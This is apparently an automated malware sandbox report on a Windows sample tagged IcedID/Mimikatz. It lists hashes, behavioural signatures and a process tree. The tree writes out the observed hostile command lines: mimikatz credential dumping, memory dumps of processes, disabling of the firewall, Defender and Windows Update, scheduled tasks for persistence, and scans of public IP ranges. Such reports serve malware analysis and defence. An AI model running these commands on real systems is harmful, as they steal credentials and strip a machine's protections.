Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-01-2025 23:42

General

  • Target

    2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe

  • Size

    7.2MB

  • MD5

    00added94b19c9166481111d1b154277

  • SHA1

    813e1d3ab1b240b7f11538ea7e45e20abd09e5d6

  • SHA256

    ce30883799ac28689368d197d70f22eccc3f8a1f7bfdc7905d2d25d00b489b01

  • SHA512

    84a5dbdee16704a64b60fbc8f70ca1c10b7a2299ab07329fa081b78492ad02ea4d4a1d3578f0dfe539c34611794b7984f7cf56f7e2387f135f75bfa36c280b6f

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30800) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2136
      • C:\Windows\TEMP\letltzgie\jtpawa.exe
        "C:\Windows\TEMP\letltzgie\jtpawa.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2876
    • C:\Users\Admin\AppData\Local\Temp\2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-02_00added94b19c9166481111d1b154277_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2584
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:5080
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3772
        • C:\Windows\fpibtvet\snutqkl.exe
          C:\Windows\fpibtvet\snutqkl.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1696
    • C:\Windows\fpibtvet\snutqkl.exe
      C:\Windows\fpibtvet\snutqkl.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2552
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1880
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2156
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3480
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2556
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3960
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3740
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:960
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4852
          • C:\Windows\mtemsclch\taatftcev\wpcap.exe
            C:\Windows\mtemsclch\taatftcev\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:3264
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:548
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1576
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3132
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1952
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                  PID:4052
              • C:\Windows\SysWOW64\net.exe
                net start npf
                4⤵
                • System Location Discovery: System Language Discovery
                PID:2560
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  5⤵
                    PID:4616
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:4972
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:528
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4680
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:456
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:852
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2552
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2408
                • C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe
                  C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:792
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:4088
                • C:\Windows\mtemsclch\Corporate\vfshost.exe
                  C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3708
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
                2⤵
                  PID:960
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4156
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2844
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3808
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1476
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3624
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:760
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3196
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1492
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:3796
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:544
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4868
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2096
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1416
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4820
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4920
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:4580
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1464
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:1452
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4976
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=Bastards assign=y
                  2⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:3888
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop SharedAccess
                  2⤵
                    PID:5056
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:512
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop SharedAccess
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:2864
                  • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                    C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 776 C:\Windows\TEMP\mtemsclch\776.dmp
                    2⤵
                    • Executes dropped EXE
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1604
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh firewall set opmode mode=disable
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2692
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh firewall set opmode mode=disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2556
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c netsh Advfirewall set allprofiles state off
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4764
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh Advfirewall set allprofiles state off
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2908
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop MpsSvc
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3988
                    • C:\Windows\SysWOW64\net.exe
                      net stop MpsSvc
                      3⤵
                        PID:1140
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop MpsSvc
                          4⤵
                            PID:3260
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1852
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3808
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop WinDefend
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1524
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop wuauserv
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3200
                        • C:\Windows\SysWOW64\net.exe
                          net stop wuauserv
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1644
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop wuauserv
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4088
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config MpsSvc start= disabled
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2208
                        • C:\Windows\SysWOW64\sc.exe
                          sc config MpsSvc start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:4928
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c sc config SharedAccess start= disabled
                        2⤵
                          PID:1768
                          • C:\Windows\SysWOW64\sc.exe
                            sc config SharedAccess start= disabled
                            3⤵
                            • Launches sc.exe
                            • System Location Discovery: System Language Discovery
                            PID:1472
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config WinDefend start= disabled
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1944
                          • C:\Windows\SysWOW64\sc.exe
                            sc config WinDefend start= disabled
                            3⤵
                            • Launches sc.exe
                            PID:3796
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config wuauserv start= disabled
                          2⤵
                            PID:4484
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:3464
                          • C:\Windows\TEMP\xohudmc.exe
                            C:\Windows\TEMP\xohudmc.exe
                            2⤵
                            • Executes dropped EXE
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:2440
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 388 C:\Windows\TEMP\mtemsclch\388.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:400
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2136 C:\Windows\TEMP\mtemsclch\2136.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:540
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2732 C:\Windows\TEMP\mtemsclch\2732.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2792
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2892 C:\Windows\TEMP\mtemsclch\2892.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2408
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2960 C:\Windows\TEMP\mtemsclch\2960.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1504
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3104 C:\Windows\TEMP\mtemsclch\3104.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5028
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3908 C:\Windows\TEMP\mtemsclch\3908.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5032
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 4004 C:\Windows\TEMP\mtemsclch\4004.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4380
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 4072 C:\Windows\TEMP\mtemsclch\4072.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:644
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2796 C:\Windows\TEMP\mtemsclch\2796.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1912
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3396 C:\Windows\TEMP\mtemsclch\3396.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4624
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 2688 C:\Windows\TEMP\mtemsclch\2688.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4284
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 1596 C:\Windows\TEMP\mtemsclch\1596.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1632
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3052 C:\Windows\TEMP\mtemsclch\3052.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1636
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 936 C:\Windows\TEMP\mtemsclch\936.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3088
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 3184 C:\Windows\TEMP\mtemsclch\3184.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1188
                          • C:\Windows\TEMP\mtemsclch\iulpaulua.exe
                            C:\Windows\TEMP\mtemsclch\iulpaulua.exe -accepteula -mp 4520 C:\Windows\TEMP\mtemsclch\4520.dmp
                            2⤵
                            • Executes dropped EXE
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1272
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c C:\Windows\mtemsclch\taatftcev\scan.bat
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:1604
                            • C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe
                              ngliteqrb.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                              3⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:1868
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                            2⤵
                              PID:4088
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1944
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                3⤵
                                  PID:4480
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  3⤵
                                    PID:3512
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3596
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2304
                              • C:\Windows\SysWOW64\rwzxsq.exe
                                C:\Windows\SysWOW64\rwzxsq.exe
                                1⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:220
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\snutqkl.exe
                                1⤵
                                  PID:4780
                                  • C:\Windows\ime\snutqkl.exe
                                    C:\Windows\ime\snutqkl.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3632
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
                                  1⤵
                                    PID:4952
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      2⤵
                                        PID:912
                                      • C:\Windows\system32\cacls.exe
                                        cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F
                                        2⤵
                                          PID:1944
                                      • C:\Windows\system32\cmd.EXE
                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
                                        1⤵
                                          PID:4792
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            2⤵
                                              PID:2284
                                            • C:\Windows\system32\cacls.exe
                                              cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F
                                              2⤵
                                                PID:4136
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\snutqkl.exe
                                              1⤵
                                                PID:3624
                                                • C:\Windows\ime\snutqkl.exe
                                                  C:\Windows\ime\snutqkl.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2328
